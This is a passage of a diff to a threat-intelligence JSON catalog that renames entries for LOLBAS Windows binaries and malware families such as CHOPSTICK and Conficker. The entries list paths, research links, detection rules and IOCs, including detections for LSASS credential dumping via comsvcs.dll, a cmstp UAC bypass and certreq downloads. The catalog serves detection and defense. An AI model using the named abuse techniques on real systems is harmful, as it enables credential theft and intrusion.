[https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda](https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda)\n* [https://mrd0x.com/the-power-of-cdb-debugging-tool/](https://mrd0x.com/the-power-of-cdb-debugging-tool/)\n* [https://twitter.com/nas_bench/status/1534957360032120833](https://twitter.com/nas_bench/status/1534957360032120833)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_cdb.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cdb.yml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* Elastic: [defense_evasion_network_connection_from_windows_binary.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml)\n* BlockRule: [https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules](https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules)[[Cdb.exe - LOLBAS Project](/references/e61b035f-6247-47e3-918c-2892815dfddf)]", @@ -3978,7 +3978,7 @@ } ], "uuid": "53a36e49-d37d-4572-9f4c-f738db27d9a5", - "value": "CertOC.exe" + "value": "CertOC.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used for installing certificates\n\n**Author:** Ensar Samil\n\n**Paths:**\n* c:\\windows\\system32\\certoc.exe\n* c:\\windows\\syswow64\\certoc.exe\n\n**Resources:**\n* [https://twitter.com/sblmsrsn/status/1445758411803480072?s=20](https://twitter.com/sblmsrsn/status/1445758411803480072?s=20)\n* [https://twitter.com/sblmsrsn/status/1452941226198671363?s=20](https://twitter.com/sblmsrsn/status/1452941226198671363?s=20)\n\n**Detection:**\n* Sigma: [proc_creation_win_certoc_load_dll.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml)\n* IOC: Process creation with given parameter\n* IOC: Unsigned DLL load via certoc.exe\n* IOC: Network connection via certoc.exe[[CertOC.exe - LOLBAS Project](/references/b906498e-2773-419b-8c6d-3e974925ac18)]", @@ -4021,7 +4021,7 @@ } ], "uuid": "e15e8ff8-4ca9-4c89-9a3a-b89e41623204", - "value": "CertReq.exe" + "value": "CertReq.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used for requesting and managing certificates\n\n**Author:** David Middlehurst\n\n**Paths:**\n* C:\\Windows\\System32\\certreq.exe\n* C:\\Windows\\SysWOW64\\certreq.exe\n\n**Resources:**\n* [https://dtm.uk/certreq](https://dtm.uk/certreq)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_susp_certreq_download.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml)\n* IOC: certreq creates new files\n* IOC: certreq makes POST requests[[CertReq.exe - LOLBAS Project](/references/be446484-8ecc-486e-8940-658c147f6978)]", @@ -4062,7 +4062,7 @@ } ], "uuid": "9d959b69-ce56-418b-b074-90d83062ca28", - "value": "certutil.exe" + "value": "certutil.exe - Associated Software" }, { "description": "[certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. [[TechNet Certutil](https://app.tidalcyber.com/references/8d095aeb-c72c-49c1-8482-dbf4ce9203ce)]", @@ -4239,7 +4239,7 @@ } ], "uuid": "c65b2f44-b691-46e9-90da-2014a929ab35", - "value": "HAYMAKER" + "value": "HAYMAKER - Associated Software" }, { "description": "[[PWC Cloud Hopper Technical Annex April 2017](https://app.tidalcyber.com/references/da6c8a72-c732-44d5-81ac-427898706eed)]", @@ -4253,7 +4253,7 @@ } ], "uuid": "0b494f14-2546-4b8f-b688-9472f7e8dc7d", - "value": "Scorpion" + "value": "Scorpion - Associated Software" }, { "description": "[ChChes](https://app.tidalcyber.com/software/3f2283ef-67c2-49a3-98ac-1aa9f0499361) is a Trojan that appears to be used exclusively by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322). It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. [[Palo Alto menuPass Feb 2017](https://app.tidalcyber.com/references/ba4f7d65-73ec-4726-b1f6-f2443ffda5e7)] [[JPCERT ChChes Feb 2017](https://app.tidalcyber.com/references/657b43aa-ead2-41d3-911a-d714d9b28e19)] [[PWC Cloud Hopper Technical Annex April 2017](https://app.tidalcyber.com/references/da6c8a72-c732-44d5-81ac-427898706eed)]", @@ -4458,7 +4458,7 @@ } ], "uuid": "cbdaa2bf-7ffb-4e48-9e8e-c06b42199d44", - "value": "Backdoor.SofacyX" + "value": "Backdoor.SofacyX - Associated Software" }, { "description": "[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", @@ -4472,7 +4472,7 @@ } ], "uuid": "14492dd1-4146-47ad-9ea0-5e6e934b625c", - "value": "SPLM" + "value": "SPLM - Associated Software" }, { "description": "[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", @@ -4486,7 +4486,7 @@ } ], "uuid": "ceb44e2f-ffbb-4316-90a2-f011a3dcad57", - "value": "Xagent" + "value": "Xagent - Associated Software" }, { "description": "[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", @@ -4500,7 +4500,7 @@ } ], "uuid": "fabf19bb-0fc7-451c-8c69-4b6c706b4e3f", - "value": "X-Agent" + "value": "X-Agent - Associated Software" }, { "description": "[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]", @@ -4514,7 +4514,7 @@ } ], "uuid": "472502d3-e94a-4045-a232-33733d6e30aa", - "value": "webhp" + "value": "webhp - Associated Software" }, { "description": "[CHOPSTICK](https://app.tidalcyber.com/software/01c6c49a-f7c8-44cd-a377-4dfd358ffeba) is a malware family of modular backdoors used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5). It has been used since at least 2012 and is usually dropped on victims as second-stage malware, though it has been used as first-stage malware in several cases. It has both Windows and Linux variants. [[FireEye APT28](https://app.tidalcyber.com/references/c423b2b2-25a3-4a8d-b89a-83ab07c0cd20)] [[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)] [[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)] [[DOJ GRU Indictment Jul 2018](https://app.tidalcyber.com/references/d65f371b-19d0-49de-b92b-94a2bea1d988)] It is tracked separately from the [X-Agent for Android](https://app.tidalcyber.com/software/).", @@ -4629,7 +4629,7 @@ } ], "uuid": "351a3856-6bc0-4712-923b-8e921785b95b", - "value": "CL_Invocation.ps1" + "value": "CL_Invocation.ps1 - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Aero diagnostics script\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\diagnostics\\system\\AERO\\CL_Invocation.ps1\n* C:\\Windows\\diagnostics\\system\\Audio\\CL_Invocation.ps1\n* C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Invocation.ps1\n\n**Resources:**\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_cl_invocation.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml)\n* Sigma: [posh_ps_cl_invocation_lolscript.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/powershell/powershell_script/posh_ps_cl_invocation_lolscript.yml)[[CL_Invocation.ps1 - LOLBAS Project](/references/a53e093a-973c-491d-91e3-bc7804d87b8b)]", @@ -4671,7 +4671,7 @@ } ], "uuid": "9c4d1519-33eb-4280-aa2e-aca22b8e822c", - "value": "CL_LoadAssembly.ps1" + "value": "CL_LoadAssembly.ps1 - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** PowerShell Diagnostic Script\n\n**Author:** Jimmy (@bohops)\n\n**Paths:**\n* C:\\Windows\\diagnostics\\system\\Audio\\CL_LoadAssembly.ps1\n\n**Resources:**\n* [https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/](https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbas_cl_loadassembly.yml](https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml)[[CL_LoadAssembly.ps1 - LOLBAS Project](/references/31a14027-1181-49b9-87bf-78a65a551312)]", @@ -4713,7 +4713,7 @@ } ], "uuid": "06c669e0-0111-45c3-868d-0b5fad1d1b42", - "value": "CL_Mutexverifiers.ps1" + "value": "CL_Mutexverifiers.ps1 - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Proxy execution with CL_Mutexverifiers.ps1\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1\n* C:\\Windows\\diagnostics\\system\\Audio\\CL_Mutexverifiers.ps1\n* C:\\Windows\\diagnostics\\system\\WindowsUpdate\\CL_Mutexverifiers.ps1\n* C:\\Windows\\diagnostics\\system\\Video\\CL_Mutexverifiers.ps1\n* C:\\Windows\\diagnostics\\system\\Speech\\CL_Mutexverifiers.ps1\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/995111125447577600](https://twitter.com/pabraeken/status/995111125447577600)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_cl_mutexverifiers.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml)[[CL_Mutexverifiers.ps1 - LOLBAS Project](/references/75b89502-21ed-4920-95cc-212eaf17f281)]", @@ -4790,7 +4790,7 @@ } ], "uuid": "4f8334fd-987a-4d3a-b7cf-e5e1800eee90", - "value": "MiniDionis" + "value": "MiniDionis - Associated Software" }, { "description": "", @@ -4804,7 +4804,7 @@ } ], "uuid": "f714e1f8-1a16-46cc-981c-26729d500770", - "value": "CloudLook" + "value": "CloudLook - Associated Software" }, { "description": "[CloudDuke](https://app.tidalcyber.com/software/b3dd424b-ee96-449c-aa52-abbc7d4dfb86) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) in 2015. [[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)] [[Securelist Minidionis July 2015](https://app.tidalcyber.com/references/af40a05e-02fb-4943-b3ff-9a292679e93d)]", @@ -4854,7 +4854,7 @@ } ], "uuid": "2757101d-84c7-4acc-be12-2f2a7b79bc2e", - "value": "cmd.exe" + "value": "cmd.exe - Associated Software" }, { "description": "[cmd](https://app.tidalcyber.com/software/98d89476-63ec-4baf-b2b3-86c52170f5d8) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. [[TechNet Cmd](https://app.tidalcyber.com/references/dbfc01fe-c300-4c27-ab9a-a20508c1e04b)]\n\nCmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., dir [[TechNet Dir](https://app.tidalcyber.com/references/f1eb8631-6bea-4688-a5ff-a388b1fdceb0)]), deleting files (e.g., del [[TechNet Del](https://app.tidalcyber.com/references/01fc44b9-0eb3-4fd2-b755-d611825374ae)]), and copying files (e.g., copy [[TechNet Copy](https://app.tidalcyber.com/references/4e0d4b94-6b4c-4104-86e6-499b6aa7ba78)]).", @@ -5032,7 +5032,7 @@ } ], "uuid": "adcf033c-3514-40b4-81fc-d0534cd0d050", - "value": "Cmdkey.exe" + "value": "Cmdkey.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** creates, lists, and deletes stored user names and passwords or credentials.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\cmdkey.exe\n* C:\\Windows\\SysWOW64\\cmdkey.exe\n\n**Resources:**\n* [https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation](https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation)\n* [https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey)\n\n**Detection:**\n* Sigma: [proc_creation_win_cmdkey_recon.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmdkey_recon.yml)[[Cmdkey.exe - LOLBAS Project](/references/c9ca075a-8327-463d-96ec-adddf6f1a7bb)]", @@ -5079,7 +5079,7 @@ } ], "uuid": "ceb926c4-0b32-4073-bfd8-b7fc05cd1d62", - "value": "cmdl32.exe" + "value": "cmdl32.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Connection Manager Auto-Download\n\n**Author:** Elliot Killick\n\n**Paths:**\n* C:\\Windows\\System32\\cmdl32.exe\n* C:\\Windows\\SysWOW64\\cmdl32.exe\n\n**Resources:**\n* [https://github.com/LOLBAS-Project/LOLBAS/pull/151](https://github.com/LOLBAS-Project/LOLBAS/pull/151)\n* [https://twitter.com/ElliotKillick/status/1455897435063074824](https://twitter.com/ElliotKillick/status/1455897435063074824)\n* [https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/](https://elliotonsecurity.com/living-off-the-land-reverse-engineering-methodology-plus-tips-and-tricks-cmdl32-case-study/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_cmdl32.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml)\n* IOC: Reports of downloading from suspicious URLs in %TMP%\\config.log\n* IOC: Useragent Microsoft(R) Connection Manager Vpn File Update[[cmdl32.exe - LOLBAS Project](/references/2628e452-caa1-4058-a405-7c4657fa3245)]", @@ -5122,7 +5122,7 @@ } ], "uuid": "7daa8928-e3ff-4e2c-9a33-df39bec265e1", - "value": "Cmstp.exe" + "value": "Cmstp.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Installs or removes a Connection Manager service profile.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\cmstp.exe\n* C:\\Windows\\SysWOW64\\cmstp.exe\n\n**Resources:**\n* [https://twitter.com/NickTyrer/status/958450014111633408](https://twitter.com/NickTyrer/status/958450014111633408)\n* [https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80](https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80)\n* [https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e](https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e)\n* [https://oddvar.moe/2017/08/15/research-on-cmstp-exe/](https://oddvar.moe/2017/08/15/research-on-cmstp-exe/)\n* [https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1](https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1)\n* [https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp)\n\n**Detection:**\n* Sigma: [proc_creation_win_cmstp_execution_by_creation.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_cmstp_execution_by_creation.yml)\n* Sigma: [proc_creation_win_uac_bypass_cmstp.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml)\n* Splunk: [cmlua_or_cmstplua_uac_bypass.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/cmlua_or_cmstplua_uac_bypass.yml)\n* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)\n* Elastic: [defense_evasion_unusual_process_network_connection.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml)\n* IOC: Execution of cmstp.exe without a VPN use case is suspicious\n* IOC: DotNet CLR libraries loaded into cmstp.exe\n* IOC: DotNet CLR Usage Log - cmstp.exe.log[[Cmstp.exe - LOLBAS Project](/references/86c21dcd-464a-4870-8aae-25fcaccc889d)]", @@ -5369,7 +5369,7 @@ } ], "uuid": "74673d53-5fe4-4e98-ade5-b4a545d2373c", - "value": "code.exe" + "value": "code.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** VSCode binary, also portable (CLI) version\n\n**Author:** PfiatDe\n\n**Paths:**\n* %LOCALAPPDATA%\\Programs\\Microsoft VS Code\\Code.exe\n* C:\\Program Files\\Microsoft VS Code\\Code.exe\n* C:\\Program Files (x86)\\Microsoft VS Code\\Code.exe\n\n**Resources:**\n* [https://badoption.eu/blog/2023/01/31/code_c2.html](https://badoption.eu/blog/2023/01/31/code_c2.html)\n* [https://code.visualstudio.com/docs/remote/tunnels](https://code.visualstudio.com/docs/remote/tunnels)\n* [https://code.visualstudio.com/blogs/2022/12/07/remote-even-better](https://code.visualstudio.com/blogs/2022/12/07/remote-even-better)\n\n**Detection:**\n* IOC: Websocket traffic to global.rel.tunnels.api.visualstudio.com\n* IOC: Process tree: code.exe -> cmd.exe -> node.exe -> winpty-agent.exe\n* IOC: File write of code_tunnel.json which is parametizable, but defaults to: %UserProfile%\\.vscode-cli\\code_tunnel.json[[code.exe - LOLBAS Project](/references/4a93063b-f3a3-4726-870d-b8f744651363)]", @@ -5432,7 +5432,7 @@ } ], "uuid": "6044424d-3732-4cac-85a8-b4059f4e0af4", - "value": "Colorcpl.exe" + "value": "Colorcpl.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary that handles color management\n\n**Author:** Arjan Onwezen\n\n**Paths:**\n* C:\\Windows\\System32\\colorcpl.exe\n* C:\\Windows\\SysWOW64\\colorcpl.exe\n\n**Resources:**\n* [https://twitter.com/eral4m/status/1480468728324231172](https://twitter.com/eral4m/status/1480468728324231172)\n\n**Detection:**\n* Sigma: [file_event_win_susp_colorcpl.yml](https://github.com/SigmaHQ/sigma/blob/master/rules/windows/file/file_event/file_event_win_susp_colorcpl.yml)\n* IOC: colorcpl.exe writing files[[Colorcpl.exe - LOLBAS Project](/references/53ff662d-a0b3-41bd-ab9e-a9bb8bbdea25)]", @@ -5524,7 +5524,7 @@ } ], "uuid": "07f103cf-9a8a-4f68-a96b-877113e6c538", - "value": "Comsvcs.dll" + "value": "Comsvcs.dll - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** COM+ Services\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\comsvcs.dll\n\n**Resources:**\n* [https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/](https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_process_dump_via_comsvcs.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml)\n* Sigma: [proc_access_win_lsass_dump_comsvcs_dll.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml)\n* Elastic: [credential_access_cmdline_dump_tool.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml)\n* Splunk: [dump_lsass_via_comsvcs_dll.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_comsvcs_dll.yml)[[Comsvcs.dll - LOLBAS Project](/references/2eb2756d-5a49-4df3-9e2f-104c41c645cd)]", @@ -5579,7 +5579,7 @@ } ], "uuid": "a8d8ea16-3ec8-41bb-a27a-7f67511a78ee", - "value": "Kido" + "value": "Kido - Associated Software" }, { "description": "[[SANS Conficker](https://app.tidalcyber.com/references/2dca2274-5f25-475a-b87d-97f3e3a525de)] ", @@ -5593,7 +5593,7 @@ } ], "uuid": "2871c307-fede-464e-b25e-ad6051d25c63", - "value": "Downadup" + "value": "Downadup - Associated Software" }, { "description": "[Conficker](https://app.tidalcyber.com/software/ef33f1fa-18a3-4b30-b359-17b7930f43a7) is a computer worm first detected in October 2008 that targeted Microsoft Windows using the MS08-067 Windows vulnerability to spread.[[SANS Conficker](https://app.tidalcyber.com/references/2dca2274-5f25-475a-b87d-97f3e3a525de)] In 2016, a variant of [Conficker](https://app.tidalcyber.com/software/ef33f1fa-18a3-4b30-b359-17b7930f43a7) made its way on computers and removable disk drives belonging to a nuclear power plant.[[Conficker Nuclear Power Plant](https://app.tidalcyber.com/references/83b8c3c4-d67a-48bd-8614-1c703a8d969b)]", @@ -5638,7 +5638,7 @@ } ], "uuid": "45ba655d-a1fc-4305-abed-38f72ef3a832", - "value": "ConfigSecurityPolicy.exe" + "value": "ConfigSecurityPolicy.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary part of Windows Defender. Used to manage settings in Windows Defender. you can configure different pilot collections for each of the co-management workloads. Being able to use different pilot collections allows you to take a more granular approach when shifting workloads.\n\n**Author:** Ialle Teixeira\n\n**Paths:**\n* C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe\n* C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2008.9-0\\ConfigSecurityPolicy.exe\n\n**Resources:**\n* [https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads](https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-switch-workloads)\n* [https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads](https://docs.microsoft.com/en-US/mem/configmgr/comanage/workloads)\n* [https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor](https://docs.microsoft.com/en-US/mem/configmgr/comanage/how-to-monitor)\n* [https://twitter.com/NtSetDefault/status/1302589153570365440?s=20](https://twitter.com/NtSetDefault/status/1302589153570365440?s=20)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_configsecuritypolicy.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml)\n* IOC: ConfigSecurityPolicy storing data into alternate data streams.\n* IOC: Preventing/Detecting ConfigSecurityPolicy with non-RFC1918 addresses by Network IPS/IDS.\n* IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching ConfigSecurityPolicy.exe.\n* IOC: User Agent is \"MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)\"[[ConfigSecurityPolicy.exe - LOLBAS Project](/references/30b8a5d8-596c-4ab3-b3db-b799cc8923e1)]", @@ -5681,7 +5681,7 @@ } ], "uuid": "8a24ebd6-9351-4197-8728-6aa45e3dfce3", - "value": "Conhost.exe" + "value": "Conhost.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Console Window host\n\n**Author:** Wietze Beukema\n\n**Paths:**\n* c:\\windows\\system32\\conhost.exe\n\n**Resources:**\n* [https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/](https://www.hexacorn.com/blog/2020/05/25/how-to-con-your-host/)\n* [https://twitter.com/Wietze/status/1511397781159751680](https://twitter.com/Wietze/status/1511397781159751680)\n* [https://twitter.com/embee_research/status/1559410767564181504](https://twitter.com/embee_research/status/1559410767564181504)\n* [https://twitter.com/ankit_anubhav/status/1561683123816972288](https://twitter.com/ankit_anubhav/status/1561683123816972288)\n\n**Detection:**\n* IOC: conhost.exe spawning unexpected processes\n* Sigma: [proc_creation_win_conhost_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_conhost_susp_child_process.yml)[[Conhost.exe - LOLBAS Project](/references/5ed807c1-15d1-48aa-b497-8cd74fe5b299)]", @@ -5722,7 +5722,7 @@ } ], "uuid": "0280eeae-b087-48c3-937c-2edf419f6835", - "value": "ScreenConnect" + "value": "ScreenConnect - Associated Software" }, { "description": "[ConnectWise](https://app.tidalcyber.com/software/6f9bb24d-cce2-49de-bedd-1849d9bde7a0) is a legitimate remote administration tool that has been used since at least 2016 by threat actors including [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) and [GOLD SOUTHFIELD](https://app.tidalcyber.com/groups/b4d068ac-9b68-4cd8-bf0c-019f910ef8e3) to connect to and conduct lateral movement in target environments.[[Anomali Static Kitten February 2021](https://app.tidalcyber.com/references/710ed789-de1f-4601-a8ba-32147827adcb)][[Trend Micro Muddy Water March 